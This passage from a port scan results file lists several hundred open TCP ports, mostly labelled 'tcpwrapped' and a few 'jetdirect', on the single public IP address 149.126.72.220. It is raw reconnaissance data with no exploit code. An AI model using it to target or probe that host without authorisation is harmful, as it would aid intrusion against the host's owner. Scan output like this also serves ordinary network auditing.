6828149.126.72.220 8029 tcp tcpwrapped open
6829149.126.72.220 8030 tcp tcpwrapped open
6830149.126.72.220 8031 tcp tcpwrapped open
6831149.126.72.220 8032 tcp tcpwrapped open
6832149.126.72.220 8033 tcp tcpwrapped open
6833149.126.72.220 8034 tcp tcpwrapped open
6834149.126.72.220 8035 tcp tcpwrapped open
6835149.126.72.220 8036 tcp tcpwrapped open
6836149.126.72.220 8037 tcp tcpwrapped open
6837149.126.72.220 8038 tcp tcpwrapped open
6838149.126.72.220 8039 tcp tcpwrapped open
6839149.126.72.220 8040 tcp tcpwrapped open
6840149.126.72.220 8041 tcp tcpwrapped open
6841149.126.72.220 8042 tcp tcpwrapped open
6842149.126.72.220 8043 tcp tcpwrapped open
6843149.126.72.220 8044 tcp tcpwrapped open
6844149.126.72.220 8045 tcp tcpwrapped open
6845149.126.72.220 8046 tcp tcpwrapped open
6846149.126.72.220 8047 tcp tcpwrapped open
6847149.126.72.220 8048 tcp tcpwrapped open
6848149.126.72.220 8049 tcp tcpwrapped open
6849149.126.72.220 8050 tcp tcpwrapped open
6850149.126.72.220 8051 tcp tcpwrapped open
6851149.126.72.220 8052 tcp tcpwrapped open
6852149.126.72.220 8053 tcp tcpwrapped open
6853149.126.72.220 8054 tcp tcpwrapped open
6854149.126.72.220 8055 tcp tcpwrapped open
6855149.126.72.220 8056 tcp tcpwrapped open
6856149.126.72.220 8057 tcp tcpwrapped open
6857149.126.72.220 8058 tcp tcpwrapped open
6858149.126.72.220 8060 tcp tcpwrapped open
6859149.126.72.220 8064 tcp tcpwrapped open
6860149.126.72.220 8065 tcp tcpwrapped open
6861149.126.72.220 8069 tcp tcpwrapped open
6862149.126.72.220 8070 tcp tcpwrapped open
6863149.126.72.220 8071 tcp tcpwrapped open
6864149.126.72.220 8072 tcp tcpwrapped open
6865149.126.72.220 8074 tcp tcpwrapped open
6866149.126.72.220 8079 tcp tcpwrapped open
6867149.126.72.220 8080 tcp tcpwrapped open
6868149.126.72.220 8081 tcp tcpwrapped open
6869149.126.72.220 8082 tcp tcpwrapped open
6870149.126.72.220 8083 tcp tcpwrapped open
6871149.126.72.220 8084 tcp tcpwrapped open
6872149.126.72.220 8085 tcp tcpwrapped open
6873149.126.72.220 8086 tcp tcpwrapped open
6874149.126.72.220 8087 tcp tcpwrapped open
6875149.126.72.220 8088 tcp tcpwrapped open
6876149.126.72.220 8089 tcp tcpwrapped open
6877149.126.72.220 8090 tcp tcpwrapped open
6878149.126.72.220 8091 tcp tcpwrapped open
6879149.126.72.220 8092 tcp tcpwrapped open
6880149.126.72.220 8093 tcp tcpwrapped open
6881149.126.72.220 8094 tcp tcpwrapped open
6882149.126.72.220 8095 tcp tcpwrapped open
6883149.126.72.220 8096 tcp tcpwrapped open
6884149.126.72.220 8097 tcp tcpwrapped open
6885149.126.72.220 8098 tcp tcpwrapped open
6886149.126.72.220 8099 tcp tcpwrapped open
6887149.126.72.220 8100 tcp tcpwrapped open
6888149.126.72.220 8101 tcp tcpwrapped open
6889149.126.72.220 8102 tcp tcpwrapped open
6890149.126.72.220 8103 tcp tcpwrapped open
6891149.126.72.220 8104 tcp tcpwrapped open
6892149.126.72.220 8105 tcp tcpwrapped open
6893149.126.72.220 8106 tcp tcpwrapped open
6894149.126.72.220 8107 tcp tcpwrapped open
6895149.126.72.220 8108 tcp tcpwrapped open
6896149.126.72.220 8109 tcp tcpwrapped open
6897149.126.72.220 8110 tcp tcpwrapped open
6898149.126.72.220 8113 tcp tcpwrapped open
6899149.126.72.220 8114 tcp tcpwrapped open
6900149.126.72.220 8115 tcp tcpwrapped open
6901149.126.72.220 8118 tcp tcpwrapped open
6902149.126.72.220 8119 tcp tcpwrapped open
6903149.126.72.220 8120 tcp tcpwrapped open
6904149.126.72.220 8121 tcp tcpwrapped open
6905149.126.72.220 8123 tcp tcpwrapped open
6906149.126.72.220 8125 tcp tcpwrapped open
6907149.126.72.220 8126 tcp tcpwrapped open
6908149.126.72.220 8128 tcp tcpwrapped open
6909149.126.72.220 8129 tcp tcpwrapped open
6910149.126.72.220 8130 tcp tcpwrapped open
6911149.126.72.220 8131 tcp tcpwrapped open
6912149.126.72.220 8132 tcp tcpwrapped open
6913149.126.72.220 8133 tcp tcpwrapped open
6914149.126.72.220 8136 tcp tcpwrapped open
6915149.126.72.220 8140 tcp tcpwrapped open
6916149.126.72.220 8142 tcp tcpwrapped open
6917149.126.72.220 8143 tcp tcpwrapped open
6918149.126.72.220 8144 tcp tcpwrapped open
6919149.126.72.220 8147 tcp tcpwrapped open
6920149.126.72.220 8148 tcp tcpwrapped open
6921149.126.72.220 8149 tcp tcpwrapped open
6922149.126.72.220 8150 tcp tcpwrapped open
6923149.126.72.220 8154 tcp tcpwrapped open
6924149.126.72.220 8156 tcp tcpwrapped open
6925149.126.72.220 8157 tcp tcpwrapped open
6926149.126.72.220 8158 tcp tcpwrapped open
6927149.126.72.220 8160 tcp tcpwrapped open
6928149.126.72.220 8161 tcp tcpwrapped open
6929149.126.72.220 8162 tcp tcpwrapped open
6930149.126.72.220 8163 tcp tcpwrapped open
6931149.126.72.220 8164 tcp tcpwrapped open
6932149.126.72.220 8165 tcp tcpwrapped open
6933149.126.72.220 8166 tcp tcpwrapped open
6934149.126.72.220 8167 tcp tcpwrapped open
6935149.126.72.220 8168 tcp tcpwrapped open
6936149.126.72.220 8169 tcp tcpwrapped open
6937149.126.72.220 8170 tcp tcpwrapped open
6938149.126.72.220 8171 tcp tcpwrapped open
6939149.126.72.220 8172 tcp tcpwrapped open
6940149.126.72.220 8173 tcp tcpwrapped open
6941149.126.72.220 8175 tcp tcpwrapped open
6942149.126.72.220 8176 tcp tcpwrapped open
6943149.126.72.220 8178 tcp tcpwrapped open
6944149.126.72.220 8179 tcp tcpwrapped open
6945149.126.72.220 8180 tcp tcpwrapped open
6946149.126.72.220 8181 tcp tcpwrapped open
6947149.126.72.220 8182 tcp tcpwrapped open
6948149.126.72.220 8183 tcp tcpwrapped open
6949149.126.72.220 8184 tcp tcpwrapped open
6950149.126.72.220 8185 tcp tcpwrapped open
6951149.126.72.220 8186 tcp tcpwrapped open
6952149.126.72.220 8187 tcp tcpwrapped open
6953149.126.72.220 8188 tcp tcpwrapped open
6954149.126.72.220 8189 tcp tcpwrapped open
6955149.126.72.220 8190 tcp tcpwrapped open
6956149.126.72.220 8191 tcp tcpwrapped open
6957149.126.72.220 8192 tcp tcpwrapped open
6958149.126.72.220 8193 tcp tcpwrapped open
6959149.126.72.220 8194 tcp tcpwrapped open
6960149.126.72.220 8195 tcp tcpwrapped open
6961149.126.72.220 8198 tcp tcpwrapped open
6962149.126.72.220 8199 tcp tcpwrapped open
6963149.126.72.220 8200 tcp tcpwrapped open
6964149.126.72.220 8203 tcp tcpwrapped open
6965149.126.72.220 8222 tcp tcpwrapped open
6966149.126.72.220 8230 tcp tcpwrapped open
6967149.126.72.220 8236 tcp tcpwrapped open
6968149.126.72.220 8237 tcp tcpwrapped open
6969149.126.72.220 8238 tcp tcpwrapped open
6970149.126.72.220 8239 tcp tcpwrapped open
6971149.126.72.220 8241 tcp tcpwrapped open
6972149.126.72.220 8243 tcp tcpwrapped open
6973149.126.72.220 8248 tcp tcpwrapped open
6974149.126.72.220 8249 tcp tcpwrapped open
6975149.126.72.220 8250 tcp tcpwrapped open
6976149.126.72.220 8251 tcp tcpwrapped open
6977149.126.72.220 8252 tcp tcpwrapped open
6978149.126.72.220 8280 tcp tcpwrapped open
6979149.126.72.220 8282 tcp tcpwrapped open
6980149.126.72.220 8333 tcp tcpwrapped open
6981149.126.72.220 8340 tcp tcpwrapped open
6982149.126.72.220 8343 tcp tcpwrapped open
6983149.126.72.220 8350 tcp tcpwrapped open
6984149.126.72.220 8381 tcp tcpwrapped open
6985149.126.72.220 8382 tcp tcpwrapped open
6986149.126.72.220 8383 tcp tcpwrapped open
6987149.126.72.220 8384 tcp tcpwrapped open
6988149.126.72.220 8385 tcp tcpwrapped open
6989149.126.72.220 8388 tcp tcpwrapped open
6990149.126.72.220 8393 tcp tcpwrapped open
6991149.126.72.220 8401 tcp tcpwrapped open
6992149.126.72.220 8402 tcp tcpwrapped open
6993149.126.72.220 8403 tcp tcpwrapped open
6994149.126.72.220 8404 tcp tcpwrapped open
6995149.126.72.220 8405 tcp tcpwrapped open
6996149.126.72.220 8406 tcp tcpwrapped open
6997149.126.72.220 8407 tcp tcpwrapped open
6998149.126.72.220 8408 tcp tcpwrapped open
6999149.126.72.220 8409 tcp tcpwrapped open
7000149.126.72.220 8410 tcp tcpwrapped open
7001149.126.72.220 8411 tcp tcpwrapped open
7002149.126.72.220 8412 tcp tcpwrapped open
7003149.126.72.220 8413 tcp tcpwrapped open
7004149.126.72.220 8414 tcp tcpwrapped open
7005149.126.72.220 8415 tcp tcpwrapped open
7006149.126.72.220 8416 tcp tcpwrapped open
7007149.126.72.220 8417 tcp tcpwrapped open
7008149.126.72.220 8418 tcp tcpwrapped open
7009149.126.72.220 8419 tcp tcpwrapped open
7010149.126.72.220 8420 tcp tcpwrapped open
7011149.126.72.220 8421 tcp tcpwrapped open
7012149.126.72.220 8422 tcp tcpwrapped open
7013149.126.72.220 8423 tcp tcpwrapped open
7014149.126.72.220 8424 tcp tcpwrapped open
7015149.126.72.220 8425 tcp tcpwrapped open
7016149.126.72.220 8426 tcp tcpwrapped open
7017149.126.72.220 8427 tcp tcpwrapped open
7018149.126.72.220 8428 tcp tcpwrapped open
7019149.126.72.220 8429 tcp tcpwrapped open
7020149.126.72.220 8430 tcp tcpwrapped open
7021149.126.72.220 8431 tcp tcpwrapped open
7022149.126.72.220 8432 tcp tcpwrapped open
7023149.126.72.220 8433 tcp tcpwrapped open
7024149.126.72.220 8435 tcp tcpwrapped open
7025149.126.72.220 8440 tcp tcpwrapped open
7026149.126.72.220 8441 tcp tcpwrapped open
7027149.126.72.220 8442 tcp tcpwrapped open
7028149.126.72.220 8443 tcp tcpwrapped open
7029149.126.72.220 8444 tcp tcpwrapped open
7030149.126.72.220 8445 tcp tcpwrapped open
7031149.126.72.220 8446 tcp tcpwrapped open
7032149.126.72.220 8447 tcp tcpwrapped open
7033149.126.72.220 8448 tcp tcpwrapped open
7034149.126.72.220 8449 tcp tcpwrapped open
7035149.126.72.220 8450 tcp tcpwrapped open
7036149.126.72.220 8451 tcp tcpwrapped open
7037149.126.72.220 8452 tcp tcpwrapped open
7038149.126.72.220 8453 tcp tcpwrapped open
7039149.126.72.220 8454 tcp tcpwrapped open
7040149.126.72.220 8455 tcp tcpwrapped open
7041149.126.72.220 8456 tcp tcpwrapped open
7042149.126.72.220 8457 tcp tcpwrapped open
7043149.126.72.220 8458 tcp tcpwrapped open
7044149.126.72.220 8459 tcp tcpwrapped open
7045149.126.72.220 8460 tcp tcpwrapped open
7046149.126.72.220 8461 tcp tcpwrapped open
7047149.126.72.220 8462 tcp tcpwrapped open
7048149.126.72.220 8463 tcp tcpwrapped open
7049149.126.72.220 8464 tcp tcpwrapped open
7050149.126.72.220 8465 tcp tcpwrapped open
7051149.126.72.220 8466 tcp tcpwrapped open
7052149.126.72.220 8467 tcp tcpwrapped open
7053149.126.72.220 8470 tcp tcpwrapped open
7054149.126.72.220 8472 tcp tcpwrapped open
7055149.126.72.220 8473 tcp tcpwrapped open
7056149.126.72.220 8475 tcp tcpwrapped open
7057149.126.72.220 8480 tcp tcpwrapped open
7058149.126.72.220 8481 tcp tcpwrapped open
7059149.126.72.220 8482 tcp tcpwrapped open
7060149.126.72.220 8484 tcp tcpwrapped open
7061149.126.72.220 8485 tcp tcpwrapped open
7062149.126.72.220 8488 tcp tcpwrapped open
7063149.126.72.220 8493 tcp tcpwrapped open
7064149.126.72.220 8494 tcp tcpwrapped open
7065149.126.72.220 8500 tcp tcpwrapped open
7066149.126.72.220 8502 tcp tcpwrapped open
7067149.126.72.220 8503 tcp tcpwrapped open
7068149.126.72.220 8504 tcp tcpwrapped open
7069149.126.72.220 8505 tcp tcpwrapped open
7070149.126.72.220 8506 tcp tcpwrapped open
7071149.126.72.220 8510 tcp tcpwrapped open
7072149.126.72.220 8513 tcp tcpwrapped open
7073149.126.72.220 8514 tcp tcpwrapped open
7074149.126.72.220 8515 tcp tcpwrapped open
7075149.126.72.220 8519 tcp tcpwrapped open
7076149.126.72.220 8520 tcp tcpwrapped open
7077149.126.72.220 8521 tcp tcpwrapped open
7078149.126.72.220 8523 tcp tcpwrapped open
7079149.126.72.220 8524 tcp tcpwrapped open
7080149.126.72.220 8525 tcp tcpwrapped open
7081149.126.72.220 8526 tcp tcpwrapped open
7082149.126.72.220 8528 tcp tcpwrapped open
7083149.126.72.220 8529 tcp tcpwrapped open
7084149.126.72.220 8530 tcp tcpwrapped open
7085149.126.72.220 8531 tcp tcpwrapped open
7086149.126.72.220 8532 tcp tcpwrapped open
7087149.126.72.220 8533 tcp tcpwrapped open
7088149.126.72.220 8536 tcp tcpwrapped open
7089149.126.72.220 8540 tcp tcpwrapped open
7090149.126.72.220 8543 tcp tcpwrapped open
7091149.126.72.220 8544 tcp tcpwrapped open
7092149.126.72.220 8548 tcp tcpwrapped open
7093149.126.72.220 8549 tcp tcpwrapped open
7094149.126.72.220 8550 tcp tcpwrapped open
7095149.126.72.220 8551 tcp tcpwrapped open
7096149.126.72.220 8553 tcp tcpwrapped open
7097149.126.72.220 8556 tcp tcpwrapped open
7098149.126.72.220 8557 tcp tcpwrapped open
7099149.126.72.220 8558 tcp tcpwrapped open
7100149.126.72.220 8560 tcp tcpwrapped open
7101149.126.72.220 8561 tcp tcpwrapped open
7102149.126.72.220 8562 tcp tcpwrapped open
7103149.126.72.220 8563 tcp tcpwrapped open
7104149.126.72.220 8564 tcp tcpwrapped open
7105149.126.72.220 8565 tcp tcpwrapped open
7106149.126.72.220 8566 tcp tcpwrapped open
7107149.126.72.220 8567 tcp tcpwrapped open
7108149.126.72.220 8568 tcp tcpwrapped open
7109149.126.72.220 8569 tcp tcpwrapped open
7110149.126.72.220 8570 tcp tcpwrapped open
7111149.126.72.220 8571 tcp tcpwrapped open
7112149.126.72.220 8573 tcp tcpwrapped open
7113149.126.72.220 8574 tcp tcpwrapped open
7114149.126.72.220 8575 tcp tcpwrapped open
7115149.126.72.220 8576 tcp tcpwrapped open
7116149.126.72.220 8577 tcp tcpwrapped open
7117149.126.72.220 8578 tcp tcpwrapped open
7118149.126.72.220 8579 tcp tcpwrapped open
7119149.126.72.220 8580 tcp tcpwrapped open
7120149.126.72.220 8581 tcp tcpwrapped open
7121149.126.72.220 8582 tcp tcpwrapped open
7122149.126.72.220 8583 tcp tcpwrapped open
7123149.126.72.220 8585 tcp tcpwrapped open
7124149.126.72.220 8586 tcp tcpwrapped open
7125149.126.72.220 8588 tcp tcpwrapped open
7126149.126.72.220 8589 tcp tcpwrapped open
7127149.126.72.220 8590 tcp tcpwrapped open
7128149.126.72.220 8591 tcp tcpwrapped open
7129149.126.72.220 8592 tcp tcpwrapped open
7130149.126.72.220 8593 tcp tcpwrapped open
7131149.126.72.220 8594 tcp tcpwrapped open
7132149.126.72.220 8595 tcp tcpwrapped open
7133149.126.72.220 8596 tcp tcpwrapped open
7134149.126.72.220 8597 tcp tcpwrapped open
7135149.126.72.220 8598 tcp tcpwrapped open
7136149.126.72.220 8599 tcp tcpwrapped open
7137149.126.72.220 8600 tcp tcpwrapped open
7138149.126.72.220 8601 tcp tcpwrapped open
7139149.126.72.220 8605 tcp tcpwrapped open
7140149.126.72.220 8606 tcp tcpwrapped open
7141149.126.72.220 8630 tcp tcpwrapped open
7142149.126.72.220 8640 tcp tcpwrapped open
7143149.126.72.220 8641 tcp tcpwrapped open
7144149.126.72.220 8643 tcp tcpwrapped open
7145149.126.72.220 8663 tcp tcpwrapped open
7146149.126.72.220 8666 tcp tcpwrapped open
7147149.126.72.220 8686 tcp tcpwrapped open
7148149.126.72.220 8688 tcp tcpwrapped open
7149149.126.72.220 8700 tcp tcpwrapped open
7150149.126.72.220 8701 tcp tcpwrapped open
7151149.126.72.220 8702 tcp tcpwrapped open
7152149.126.72.220 8703 tcp tcpwrapped open
7153149.126.72.220 8704 tcp tcpwrapped open
7154149.126.72.220 8705 tcp tcpwrapped open
7155149.126.72.220 8706 tcp tcpwrapped open
7156149.126.72.220 8707 tcp tcpwrapped open
7157149.126.72.220 8708 tcp tcpwrapped open
7158149.126.72.220 8709 tcp tcpwrapped open
7159149.126.72.220 8723 tcp tcpwrapped open
7160149.126.72.220 8724 tcp tcpwrapped open
7161149.126.72.220 8731 tcp tcpwrapped open
7162149.126.72.220 8732 tcp tcpwrapped open
7163149.126.72.220 8764 tcp tcpwrapped open
7164149.126.72.220 8765 tcp tcpwrapped open
7165149.126.72.220 8766 tcp tcpwrapped open
7166149.126.72.220 8767 tcp tcpwrapped open
7167149.126.72.220 8771 tcp tcpwrapped open
7168149.126.72.220 8787 tcp tcpwrapped open
7169149.126.72.220 8788 tcp tcpwrapped open
7170149.126.72.220 8789 tcp tcpwrapped open
7171149.126.72.220 8790 tcp tcpwrapped open
7172149.126.72.220 8791 tcp tcpwrapped open
7173149.126.72.220 8800 tcp tcpwrapped open
7174149.126.72.220 8801 tcp tcpwrapped open
7175149.126.72.220 8802 tcp tcpwrapped open
7176149.126.72.220 8803 tcp tcpwrapped open
7177149.126.72.220 8804 tcp tcpwrapped open
7178149.126.72.220 8805 tcp tcpwrapped open
7179149.126.72.220 8806 tcp tcpwrapped open
7180149.126.72.220 8807 tcp tcpwrapped open
7181149.126.72.220 8808 tcp tcpwrapped open
7182149.126.72.220 8809 tcp tcpwrapped open
7183149.126.72.220 8810 tcp tcpwrapped open
7184149.126.72.220 8811 tcp tcpwrapped open
7185149.126.72.220 8812 tcp tcpwrapped open
7186149.126.72.220 8813 tcp tcpwrapped open
7187149.126.72.220 8814 tcp tcpwrapped open
7188149.126.72.220 8815 tcp tcpwrapped open
7189149.126.72.220 8816 tcp tcpwrapped open
7190149.126.72.220 8817 tcp tcpwrapped open
7191149.126.72.220 8818 tcp tcpwrapped open
7192149.126.72.220 8819 tcp tcpwrapped open
7193149.126.72.220 8820 tcp tcpwrapped open
7194149.126.72.220 8821 tcp tcpwrapped open
7195149.126.72.220 8822 tcp tcpwrapped open
7196149.126.72.220 8823 tcp tcpwrapped open
7197149.126.72.220 8824 tcp tcpwrapped open
7198149.126.72.220 8825 tcp tcpwrapped open
7199149.126.72.220 8826 tcp tcpwrapped open
7200149.126.72.220 8827 tcp tcpwrapped open
7201149.126.72.220 8828 tcp tcpwrapped open
7202149.126.72.220 8829 tcp tcpwrapped open
7203149.126.72.220 8830 tcp tcpwrapped open
7204149.126.72.220 8831 tcp tcpwrapped open
7205149.126.72.220 8832 tcp tcpwrapped open
7206149.126.72.220 8833 tcp tcpwrapped open
7207149.126.72.220 8834 tcp tcpwrapped open
7208149.126.72.220 8835 tcp tcpwrapped open
7209149.126.72.220 8836 tcp tcpwrapped open
7210149.126.72.220 8837 tcp tcpwrapped open
7211149.126.72.220 8838 tcp tcpwrapped open
7212149.126.72.220 8839 tcp tcpwrapped open
7213149.126.72.220 8840 tcp tcpwrapped open
7214149.126.72.220 8841 tcp tcpwrapped open
7215149.126.72.220 8842 tcp tcpwrapped open
7216149.126.72.220 8843 tcp tcpwrapped open
7217149.126.72.220 8844 tcp tcpwrapped open
7218149.126.72.220 8845 tcp tcpwrapped open
7219149.126.72.220 8846 tcp tcpwrapped open
7220149.126.72.220 8847 tcp tcpwrapped open
7221149.126.72.220 8848 tcp tcpwrapped open
7222149.126.72.220 8849 tcp tcpwrapped open
7223149.126.72.220 8850 tcp tcpwrapped open
7224149.126.72.220 8851 tcp tcpwrapped open
7225149.126.72.220 8852 tcp tcpwrapped open
7226149.126.72.220 8853 tcp tcpwrapped open
7227149.126.72.220 8854 tcp tcpwrapped open
7228149.126.72.220 8855 tcp tcpwrapped open
7229149.126.72.220 8856 tcp tcpwrapped open
7230149.126.72.220 8857 tcp tcpwrapped open
7231149.126.72.220 8858 tcp tcpwrapped open
7232149.126.72.220 8859 tcp tcpwrapped open
7233149.126.72.220 8860 tcp tcpwrapped open
7234149.126.72.220 8861 tcp tcpwrapped open
7235149.126.72.220 8862 tcp tcpwrapped open
7236149.126.72.220 8863 tcp tcpwrapped open
7237149.126.72.220 8864 tcp tcpwrapped open
7238149.126.72.220 8865 tcp tcpwrapped open
7239149.126.72.220 8866 tcp tcpwrapped open
7240149.126.72.220 8867 tcp tcpwrapped open
7241149.126.72.220 8868 tcp tcpwrapped open
7242149.126.72.220 8869 tcp tcpwrapped open
7243149.126.72.220 8870 tcp tcpwrapped open
7244149.126.72.220 8871 tcp tcpwrapped open
7245149.126.72.220 8872 tcp tcpwrapped open
7246149.126.72.220 8873 tcp tcpwrapped open
7247149.126.72.220 8874 tcp tcpwrapped open
7248149.126.72.220 8875 tcp tcpwrapped open
7249149.126.72.220 8876 tcp tcpwrapped open
7250149.126.72.220 8877 tcp tcpwrapped open
7251149.126.72.220 8878 tcp tcpwrapped open
7252149.126.72.220 8879 tcp tcpwrapped open
7253149.126.72.220 8880 tcp tcpwrapped open
7254149.126.72.220 8881 tcp tcpwrapped open
7255149.126.72.220 8882 tcp tcpwrapped open
7256149.126.72.220 8883 tcp tcpwrapped open
7257149.126.72.220 8884 tcp tcpwrapped open
7258149.126.72.220 8885 tcp tcpwrapped open
7259149.126.72.220 8887 tcp tcpwrapped open
7260149.126.72.220 8888 tcp tcpwrapped open
7261149.126.72.220 8889 tcp tcpwrapped open
7262149.126.72.220 8890 tcp tcpwrapped open
7263149.126.72.220 8891 tcp tcpwrapped open
7264149.126.72.220 8899 tcp tcpwrapped open
7265149.126.72.220 8900 tcp tcpwrapped open
7266149.126.72.220 8901 tcp tcpwrapped open
7267149.126.72.220 8902 tcp tcpwrapped open
7268149.126.72.220 8905 tcp tcpwrapped open
7269149.126.72.220 8906 tcp tcpwrapped open
7270149.126.72.220 8907 tcp tcpwrapped open
7271149.126.72.220 8908 tcp tcpwrapped open
7272149.126.72.220 8910 tcp tcpwrapped open
7273149.126.72.220 8911 tcp tcpwrapped open
7274149.126.72.220 8912 tcp tcpwrapped open
7275149.126.72.220 8913 tcp tcpwrapped open
7276149.126.72.220 8915 tcp tcpwrapped open
7277149.126.72.220 8916 tcp tcpwrapped open
7278149.126.72.220 8935 tcp tcpwrapped open
7279149.126.72.220 8943 tcp tcpwrapped open
7280149.126.72.220 8969 tcp tcpwrapped open
7281149.126.72.220 8988 tcp tcpwrapped open
7282149.126.72.220 8989 tcp tcpwrapped open
7283149.126.72.220 8999 tcp tcpwrapped open
7284149.126.72.220 9000 tcp tcpwrapped open
7285149.126.72.220 9001 tcp tcpwrapped open
7286149.126.72.220 9002 tcp tcpwrapped open
7287149.126.72.220 9003 tcp tcpwrapped open
7288149.126.72.220 9004 tcp tcpwrapped open
7289149.126.72.220 9005 tcp tcpwrapped open
7290149.126.72.220 9006 tcp tcpwrapped open
7291149.126.72.220 9007 tcp tcpwrapped open
7292149.126.72.220 9008 tcp tcpwrapped open
7293149.126.72.220 9009 tcp tcpwrapped open
7294149.126.72.220 9010 tcp tcpwrapped open
7295149.126.72.220 9011 tcp tcpwrapped open
7296149.126.72.220 9012 tcp tcpwrapped open
7297149.126.72.220 9013 tcp tcpwrapped open
7298149.126.72.220 9014 tcp tcpwrapped open
7299149.126.72.220 9015 tcp tcpwrapped open
7300149.126.72.220 9016 tcp tcpwrapped open
7301149.126.72.220 9017 tcp tcpwrapped open
7302149.126.72.220 9018 tcp tcpwrapped open
7303149.126.72.220 9019 tcp tcpwrapped open
7304149.126.72.220 9020 tcp tcpwrapped open
7305149.126.72.220 9021 tcp tcpwrapped open
7306149.126.72.220 9022 tcp tcpwrapped open
7307149.126.72.220 9023 tcp tcpwrapped open
7308149.126.72.220 9024 tcp tcpwrapped open
7309149.126.72.220 9025 tcp tcpwrapped open
7310149.126.72.220 9026 tcp tcpwrapped open
7311149.126.72.220 9027 tcp tcpwrapped open
7312149.126.72.220 9028 tcp tcpwrapped open
7313149.126.72.220 9029 tcp tcpwrapped open
7314149.126.72.220 9030 tcp tcpwrapped open
7315149.126.72.220 9031 tcp tcpwrapped open
7316149.126.72.220 9032 tcp tcpwrapped open
7317149.126.72.220 9033 tcp tcpwrapped open
7318149.126.72.220 9034 tcp tcpwrapped open
7319149.126.72.220 9035 tcp tcpwrapped open
7320149.126.72.220 9036 tcp tcpwrapped open
7321149.126.72.220 9037 tcp tcpwrapped open
7322149.126.72.220 9038 tcp tcpwrapped open
7323149.126.72.220 9039 tcp tcpwrapped open
7324149.126.72.220 9040 tcp tcpwrapped open
7325149.126.72.220 9041 tcp tcpwrapped open
7326149.126.72.220 9042 tcp tcpwrapped open
7327149.126.72.220 9043 tcp tcpwrapped open
7328149.126.72.220 9044 tcp tcpwrapped open
7329149.126.72.220 9045 tcp tcpwrapped open
7330149.126.72.220 9046 tcp tcpwrapped open
7331149.126.72.220 9047 tcp tcpwrapped open
7332149.126.72.220 9048 tcp tcpwrapped open
7333149.126.72.220 9049 tcp tcpwrapped open
7334149.126.72.220 9050 tcp tcpwrapped open
7335149.126.72.220 9051 tcp tcpwrapped open
7336149.126.72.220 9052 tcp tcpwrapped open
7337149.126.72.220 9058 tcp tcpwrapped open
7338149.126.72.220 9060 tcp tcpwrapped open
7339149.126.72.220 9061 tcp tcpwrapped open
7340149.126.72.220 9070 tcp tcpwrapped open
7341149.126.72.220 9080 tcp tcpwrapped open
7342149.126.72.220 9081 tcp tcpwrapped open
7343149.126.72.220 9082 tcp tcpwrapped open
7344149.126.72.220 9084 tcp tcpwrapped open
7345149.126.72.220 9085 tcp tcpwrapped open
7346149.126.72.220 9086 tcp tcpwrapped open
7347149.126.72.220 9088 tcp tcpwrapped open
7348149.126.72.220 9089 tcp tcpwrapped open
7349149.126.72.220 9090 tcp tcpwrapped open
7350149.126.72.220 9091 tcp tcpwrapped open
7351149.126.72.220 9092 tcp tcpwrapped open
7352149.126.72.220 9093 tcp tcpwrapped open
7353149.126.72.220 9094 tcp tcpwrapped open
7354149.126.72.220 9095 tcp tcpwrapped open
7355149.126.72.220 9096 tcp tcpwrapped open
7356149.126.72.220 9097 tcp tcpwrapped open
7357149.126.72.220 9098 tcp tcpwrapped open
7358149.126.72.220 9099 tcp tcpwrapped open
7359149.126.72.220 9100 tcp jetdirect open
7360149.126.72.220 9101 tcp jetdirect open
7361149.126.72.220 9102 tcp jetdirect open
7362149.126.72.220 9103 tcp jetdirect open
7363149.126.72.220 9104 tcp jetdirect open
7364149.126.72.220 9105 tcp jetdirect open
7365149.126.72.220 9106 tcp jetdirect open
7366149.126.72.220 9107 tcp jetdirect open
7367149.126.72.220 9108 tcp tcpwrapped open
7368149.126.72.220 9109 tcp tcpwrapped open
7369149.126.72.220 9110 tcp tcpwrapped open
7370149.126.72.220 9111 tcp tcpwrapped open
7371149.126.72.220 9136 tcp tcpwrapped open
7372149.126.72.220 9143 tcp tcpwrapped open
7373149.126.72.220 9189 tcp tcpwrapped open
7374149.126.72.220 9199 tcp tcpwrapped open
7375149.126.72.220 9200 tcp tcpwrapped open
7376149.126.72.220 9201 tcp tcpwrapped open
7377149.126.72.220 9202 tcp tcpwrapped open
7378149.126.72.220 9203 tcp tcpwrapped open
7379149.126.72.220 9204 tcp tcpwrapped open
7380149.126.72.220 9205 tcp tcpwrapped open
7381149.126.72.220 9206 tcp tcpwrapped open
7382149.126.72.220 9207 tcp tcpwrapped open
7383149.126.72.220 9208 tcp tcpwrapped open
7384149.126.72.220 9209 tcp tcpwrapped open
7385149.126.72.220 9210 tcp tcpwrapped open
7386149.126.72.220 9211 tcp tcpwrapped open
7387149.126.72.220 9212 tcp tcpwrapped open
7388149.126.72.220 9213 tcp tcpwrapped open
7389149.126.72.220 9214 tcp tcpwrapped open
7390149.126.72.220 9215 tcp tcpwrapped open
7391149.126.72.220 9216 tcp tcpwrapped open
7392149.126.72.220 9217 tcp tcpwrapped open
7393149.126.72.220 9218 tcp tcpwrapped open
7394149.126.72.220 9219 tcp tcpwrapped open
7395149.126.72.220 9220 tcp tcpwrapped open
7396149.126.72.220 9221 tcp tcpwrapped open
7397149.126.72.220 9236 tcp tcpwrapped open
7398149.126.72.220 9251 tcp tcpwrapped open
7399149.126.72.220 9289 tcp tcpwrapped open
7400149.126.72.220 9299 tcp tcpwrapped open
7401149.126.72.220 9300 tcp tcpwrapped open
7402149.126.72.220 9301 tcp tcpwrapped open
7403149.126.72.220 9302 tcp tcpwrapped open
7404149.126.72.220 9303 tcp tcpwrapped open
7405149.126.72.220 9304 tcp tcpwrapped open
7406149.126.72.220 9305 tcp tcpwrapped open
7407149.126.72.220 9306 tcp tcpwrapped open
7408149.126.72.220 9307 tcp tcpwrapped open
7409149.126.72.220 9308 tcp tcpwrapped open
7410149.126.72.220 9309 tcp tcpwrapped open
7411149.126.72.220 9310 tcp tcpwrapped open
7412149.126.72.220 9311 tcp tcpwrapped open
7413149.126.72.220 9350 tcp tcpwrapped open
7414149.126.72.220 9383 tcp tcpwrapped open
7415149.126.72.220 9387 tcp tcpwrapped open
7416149.126.72.220 9389 tcp tcpwrapped open
7417149.126.72.220 9433 tcp tcpwrapped open
7418149.126.72.220 9443 tcp tcpwrapped open
7419149.126.72.220 9444 tcp tcpwrapped open
7420149.126.72.220 9446 tcp tcpwrapped open
7421149.126.72.220 9447 tcp tcpwrapped open
7422149.126.72.220 9500 tcp tcpwrapped open
7423149.126.72.220 9510 tcp tcpwrapped open
7424149.126.72.220 9530 tcp tcpwrapped open
7425149.126.72.220 9550 tcp tcpwrapped open
7426149.126.72.220 9600 tcp tcpwrapped open
7427149.126.72.220 9663 tcp tcpwrapped open
